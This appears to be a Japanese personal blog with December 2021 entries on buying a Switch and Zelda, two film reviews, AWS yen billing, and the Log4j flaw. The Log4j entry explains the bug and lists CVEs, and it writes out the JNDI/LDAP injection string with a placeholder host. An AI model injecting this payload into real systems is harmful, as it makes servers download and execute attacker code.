12/30 (木)
Nintendo Switch とゼルダの伝説 ブレス・オブ・ザ・ワイルド
昨日、テレビ朝日の「テレビゲーム総選挙」という番組で「ゼルダの伝説 ブレス オブ ザ ワイルド」が1位を獲ったに触発されて、Nintendo Switch (有機 EL モデル)と同ソフトの DL 版を購入した。
ゲーム機は友達から譲られたセガサターンしか持ってなかったので、何気に自分で購入した最初のコンソールゲーム機になる。 有機 EL ディスプレイは鮮明だが画面が狭いとプレイし辛いので PC 用 1920×1080 ピクセルのメインディスプレイに接続してプレイすることにした。
12/24 (金)
[Movie] キングスマン:ファースト・エージェント
109シネマズ川崎で『キングスマン:ファースト・エージェント』(原題: The King's Man)で字幕版を観る。
1作目が2015年9月13日に、2作目が2018年1月5日に公開されたが、今作はその前日譚になる。
ラスプーチンのコサックダンスとバレーを組み合あせたような戦闘シーンは圧巻。 久しぶりにすっきりしたアクション映画を観た。
12/17 (金)
[Movie] マトリックス レザレクションズ
109シネマズ川崎で『マトリックス レザレクションズ』(原題: The Matrix Resurrections)で吹替版を観る。
初代のマトリックスが1999年に公開なので20年以上前の作品になり、美青年だったキヌア・リーブスもすっかりおじさんになってしまった。 この作品はそういう3部作の思入れがある人へのファンサービスみたいな映画になっている。 自分も初代からずっと劇場で観ていた人間だが、観ていて懐かしいような、今さら作らなくてもいいような気持ちになる。
12/10 (金)
Apache Log4j バージョン2に深刻の脆弱性
Apache Log4j バージョン2 に深刻な脆弱性が見つかった。 任意コードが実行されるというもので、しかも Tomcat ような Web サーバーを作りそのログを記録している場合、GET メソッドのパラメータ部分にエンコーディングするだけで脆弱性をつくことができる。 認証に失敗した場合でも脆弱性をつくことができる。
Log4j でログ出力する文字列内に ${jndi:ldap://host:port}
があること、これが解釈されて外部になる JAR ファイルをダウンロードして実行してしまうというものだ。
脆弱性は連続的に発見されている。
- CVE-2021-44228
- CVE-2021-45046
- CVE-2021-45105
- CVE-2021-44548
- CVE-2021-44832
追記: 12/29
現在の最新は Log4j 2.17.1 で既存の脆弱性が全て修正されるようだ。
12/6 (月)
AWS の支払いが円建てに
AWS の支払い先はこれまで米国本社だったが、日本国内のユーザーは日本支社に切り替わった。 これによって支払い通貨がドル以外に円が選択できるようになった。
クレジットカード払いの場合はどっちでも手間が変わらないが、銀行振込の場合には海外送金が必要だったのが、国内銀行の振込でよくなった。